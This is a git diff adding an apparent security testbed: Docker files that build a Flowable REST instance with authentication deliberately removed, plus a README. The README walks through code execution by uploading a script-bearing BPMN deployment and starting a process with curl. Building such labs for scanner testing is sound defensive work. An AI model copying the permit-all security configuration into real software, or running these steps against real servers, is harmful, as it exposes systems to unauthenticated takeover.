diff --git a/flowable/exposed_ui/Dockerfile b/flowable/exposed_ui/Dockerfile new file mode 100644 index 00000000..534dc142 --- /dev/null +++ b/flowable/exposed_ui/Dockerfile @@ -0,0 +1,19 @@ +FROM eclipse-temurin:21-jdk AS builder + +# Copy the Flowable REST app libs for compilation classpath +COPY --from=flowable/flowable-rest /app/WEB-INF/lib /libs +COPY --from=flowable/flowable-rest /app/WEB-INF/classes /classes + +# Copy our replacement SecurityConfiguration +COPY SecurityConfiguration.java /src/SecurityConfiguration.java + +# Compile the replacement SecurityConfiguration against the app's classpath +RUN javac -cp "/libs/*:/classes" \ + -d /output \ + /src/SecurityConfiguration.java + +FROM flowable/flowable-rest + +# Replace the original SecurityConfiguration with our permit-all version +COPY --from=builder /output/org/flowable/rest/conf/SecurityConfiguration.class \ + /app/WEB-INF/classes/org/flowable/rest/conf/SecurityConfiguration.class diff --git a/flowable/exposed_ui/README.md b/flowable/exposed_ui/README.md new file mode 100644 index 00000000..83330f99 --- /dev/null +++ b/flowable/exposed_ui/README.md @@ -0,0 +1,40 @@ +# Setup secure and vulnerable Flowable instances +```bash +docker compose up +``` + +## Test Secure Instance +The secure instance requires basic authentication (default credentials: `rest-admin:test`): +```bash +# Without credentials — should return 401 Unauthorized +curl -s -o /dev/null -w "%{http_code}" http://localhost:8080/flowable-rest/service/repository/deployments +# Expected: 401 + +# With credentials — should return 200 OK +curl -v -u rest-admin:test http://localhost:8080/flowable-rest/service/repository/deployments +# Expected: HTTP/1.1 200 with http response contains a json +``` + +## Test Vulnerable Instance +The vulnerable instance has basic authentication disabled: +```bash +# Without credentials — should return 200 OK (no auth required) +curl -v http://localhost:8081/flowable-rest/service/repository/deployments +# Expected: HTTP/1.1 200 +``` + +# How to Exploit the Exposed UI (on Vulnerable Instance) +```bash +curl -X POST \ + 'http://localhost:8081/flowable-rest/service/repository/deployments' \ + -H 'Content-Type: multipart/form-data' \ + -F 'file=@jsScript.bpmn' + +curl -X POST \ + 'http://localhost:8081/flowable-rest/service/runtime/process-instances' \ + -H 'Content-Type: application/json' \ + -d '{ + "processDefinitionKey": "jsScriptProcess" + }' +``` +Look for the `"variables":[{"name":"commandOutput","type":"string","value":"` at output of the last command. diff --git a/flowable/exposed_ui/SecurityConfiguration.java b/flowable/exposed_ui/SecurityConfiguration.java new file mode 100644 index 00000000..4ad672ac --- /dev/null +++ b/flowable/exposed_ui/SecurityConfiguration.java @@ -0,0 +1,41 @@ +/* + * Copyright 2026 Google LLC + * + * Modified from the original version to remove authentication checks + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ +package org.flowable.rest.conf; + +import org.springframework.context.annotation.Bean; +import org.springframework.context.annotation.Configuration; +import org.springframework.security.config.annotation.web.builders.HttpSecurity; +import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity; +import org.springframework.security.web.SecurityFilterChain; + +@Configuration +@EnableWebSecurity +public class SecurityConfiguration { + + @Bean + public SecurityFilterChain securityFilterChain(HttpSecurity http) throws Exception { + http + .authorizeHttpRequests(authorize -> authorize + .anyRequest().permitAll() + ) + .csrf(csrf -> csrf.disable()) + .httpBasic(basic -> basic.disable()); + return http.build(); + } +} diff --git a/flowable/exposed_ui/docker-compose.yml b/flowable/exposed_ui/docker-compose.yml new file mode 100644 index 00000000..1f36f15f --- /dev/null +++ b/flowable/exposed_ui/docker-compose.yml @@ -0,0 +1,22 @@ +version: '3' + +services: + flowable-secure: + image: flowable/flowable-rest + container_name: flowable-rest-secure + ports: + - "8080:8080" + networks: + - flowable-network + + flowable-vulnerable: + build: . + container_name: flowable-rest-vulnerable + ports: + - "8081:8080" + networks: + - flowable-network + +networks: + flowable-network: + driver: bridge diff --git a/flowable/exposed_ui/jsScript.bpmn b/flowable/exposed_ui/jsScript.bpmn new file mode 100644 index 00000000..0ec2779e --- /dev/null +++ b/flowable/exposed_ui/jsScript.bpmn @@ -0,0 +1,30 @@ + + + + + + + + + + + + + +